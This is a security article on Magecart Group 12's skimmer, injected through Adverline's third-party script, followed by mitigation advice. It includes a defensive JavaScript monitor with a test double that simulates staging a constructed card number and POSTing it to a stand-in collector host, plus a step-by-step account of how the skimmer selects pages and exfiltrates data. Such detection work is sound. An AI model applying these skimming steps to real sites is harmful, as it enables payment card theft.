In a recent incident, Magecart, the umbrella name for a set of criminal groups that specialize in web skimming, compromised 277 e-commerce websites through a supply-chain attack. Researchers from RiskIQ and Trend Micro attribute the campaign to “Magecart Group 12”, which infiltrated a third-party JavaScript library that the affected sites loaded.

Magecart groups have previously gained notoriety for heists against large businesses, including Ticketmaster and British Airways. Their modus operandi is to inject malicious JavaScript into e-commerce checkout pages, capture the payment details a customer types into the form, and transmit them to a server the attackers control. What stands out in this campaign is the point of injection: rather than compromising each victim site directly, the group compromised one third-party provider and reached every site that loaded its script. The approach is not new for Magecart (the Ticketmaster breach also ran through a third-party chatbot script), but the scale here shows how far a single compromised dependency reaches.

In this case, Magecart Group 12 targeted a JavaScript library from Adverline, a French online advertising firm whose script numerous European e-commerce sites embed for advertising functionality. By altering that one script, the group had its skimmer loaded by every site that embedded the library, without touching the victim sites themselves.

Trend Micro's analysis describes how the embedded code resists detection and analysis. The skimmer is delivered as two obfuscated scripts: the first performs integrity checks on the skimmer code before it runs, so that a copy that has been de-obfuscated or otherwise modified for analysis does not behave like the original, and the second does the actual data collection. Splitting the work this way slows analysis and delays mitigation, because site administrators must get past the first script's checks before they can see what the second one does.

Once loaded on a site, the code first confirms it is running on a page associated with payment by scanning the URL for strings such as ‘checkout’ or ‘billing’, and only then begins skimming. It reads the values typed into the payment form's inputs and stages them in the browser's localStorage under the key ‘Cache’, Base64-encoded, together with a unique identifier stored as an ‘E-tag’ that ties the data to the victim. Staging the data locally rather than sending it field by field lets the skimmer send everything in a single request later.

The skimmer completes the theft when the user leaves the payment page: its handler for the page's unload event fires and sends the staged data to the attackers' server in an HTTP POST request, again Base64-encoded. A request that fires only as the page is being torn down is easy to miss in a casual review of network activity, which underscores the need for closer scrutiny of the third-party scripts e-commerce platforms load.
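Page-side detection of the two behaviours just described (a Base64 blob staged in localStorage, then a Base64 POST body sent as the page unloads), as an added example written for this edit. It is not code from the article, from Trend Micro or from Adverline; the checkout markers come from the article, while the key names, the Base64 and Luhn heuristics, the hook design and the test double at the bottom are assumptions made for the example.

```javascript
// Added example (not the skimmer's code, nor Trend Micro's or Adverline's): a
// page-side monitor for a Base64 blob written to localStorage and a Base64 POST
// body sent from an unload handler. It hooks Storage.prototype.setItem (not
// localStorage.setItem: assigning that would hit the Storage named-property
// setter and store a string) and XMLHttpRequest.prototype.open/send.
const CHECKOUT_MARKERS = ["checkout", "billing"]; // the two strings the article names

function isCheckoutUrl(url) {
  const lower = String(url).toLowerCase();
  return CHECKOUT_MARKERS.some((m) => lower.includes(m));
}

// Conservative Base64 test: alphabet, padding, length a multiple of 4, not tiny.
function looksLikeBase64(s) {
  return typeof s === "string" && s.length >= 16 && s.length % 4 === 0 &&
    /^[A-Za-z0-9+\/]+={0,2}$/.test(s);
}
const decodeBase64 = (s) => (typeof atob === "function" ? atob(s) : Buffer.from(s, "base64").toString("latin1"));

// Luhn check: real card numbers pass it, most random digit runs do not.
function luhnValid(digits) {
  let sum = 0;
  for (let i = 0; i < digits.length; i++) {
    let d = Number(digits[digits.length - 1 - i]);
    if (i % 2 === 1) { d *= 2; if (d > 9) d -= 9; }
    sum += d;
  }
  return sum % 10 === 0;
}
function containsCardNumber(text) {
  const runs = text.replace(/[ -]/g, "").match(/\d{13,19}/g) || [];
  return runs.some(luhnValid);
}

// Never log a full PAN: keep the first six and last four digits of any candidate.
function maskPans(text) {
  return text.replace(/\d{13,19}/g, (m) => m.slice(0, 6) + "*".repeat(m.length - 10) + m.slice(-4));
}

// Returns a finding when `value` is a Base64 blob that decodes to card-like data, else null.
function inspectBlob(kind, value, context) {
  if (!looksLikeBase64(value)) return null;
  const decoded = decodeBase64(value);
  return containsCardNumber(decoded) ? { kind, ...context, sample: maskPans(decoded) } : null;
}

// Install the hooks on a window-like object. Run this before any third-party
// script so the unload listener below is registered, and therefore fires, first.
function installSkimmerMonitor(win, report) {
  let unloading = false;
  win.addEventListener("beforeunload", () => { unloading = true; }, true);
  const origSet = win.Storage.prototype.setItem;
  win.Storage.prototype.setItem = function (key, value) {
    const f = inspectBlob("storage", value, { key });
    if (f) report(f);
    return origSet.call(this, key, value);
  };
  const XHR = win.XMLHttpRequest, origOpen = XHR.prototype.open, origSend = XHR.prototype.send;
  XHR.prototype.open = function (method, url, ...rest) {
    this.__monitorUrl = url; // remembered so send() can report the destination
    return origOpen.call(this, method, url, ...rest);
  };
  XHR.prototype.send = function (body) {
    const f = inspectBlob("exfil", body, { url: String(this.__monitorUrl), unloading });
    if (f) report(f);
    return origSend.call(this, body);
  };
}

// Constructed test double so the monitor runs under Node without a browser.
function makeFakeWindow() {
  const listeners = {}, store = new Map();
  class FakeStorage {
    setItem(k, v) { store.set(k, String(v)); }
    getItem(k) { return store.has(k) ? store.get(k) : null; }
  }
  class FakeXHR { open(m, url) { this.url = url; } send(body) { this.sentBody = body; } }
  return {
    addEventListener: (type, fn) => (listeners[type] = listeners[type] || []).push(fn),
    dispatch: (type) => (listeners[type] || []).forEach((fn) => fn({ type })),
    Storage: FakeStorage, localStorage: new FakeStorage(), XMLHttpRequest: FakeXHR,
  };
}

// Replays the described sequence against the double with constructed form data.
function demo() {
  const win = makeFakeWindow(), findings = [];
  installSkimmerMonitor(win, (f) => findings.push(f));
  const blob = Buffer.from("cc=4111111111111111&exp=12/26&cvv=123").toString("base64"); // constructed
  win.localStorage.setItem("Cache", blob);       // staged while the form is being filled in
  win.dispatch("beforeunload");                  // the user leaves the page
  const xhr = new win.XMLHttpRequest();
  xhr.open("POST", "https://collector.example.invalid/");
  xhr.send(win.localStorage.getItem("Cache"));  // exfiltrated in one request
  return findings;
}
```

Running `demo()` yields two findings, one for the `Cache` write and one for the POST with `unloading: true`, and neither finding carries the full card number. The two hooks cover only what the article describes: a skimmer that assigns `localStorage.Cache = ...` directly, or that exfiltrates with `fetch`, `navigator.sendBeacon` or an image beacon, would need additional hooks, and the monitor must be the first script on the page for its unload listener to fire before the skimmer's.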

The implications of such supply-chain attacks are particularly significant for businesses that depend on external scripts for core functionality. Organizations must evaluate those dependencies and apply rigorous security practices to defend against adversaries like Magecart. The tactics Magecart Group 12 used here map to the MITRE ATT&CK framework under initial access (the compromised supply chain), execution (malicious JavaScript running in customers' browsers), persistence, and exfiltration.

In response to the breach, Adverline promptly fixed the weakness that allowed the modification and removed the malicious code from its library, but the incident is a stark reminder of the risk carried by supply-chain dependencies. E-commerce organizations should treat every third-party script on a checkout page as part of their attack surface: pin scripts with Subresource Integrity where the provider serves a stable file, use a Content-Security-Policy to restrict where pages may send data, and monitor checkout pages for scripts, storage writes and outbound requests they do not expect.

The ongoing evolution of Magecart and similar groups illustrates the critical need for continuous monitoring and improvement of cybersecurity practices. With the ever-present risk of data breaches and financial theft, business leaders must prioritize investment in security measures to fortify their defenses against such adversarial threats.
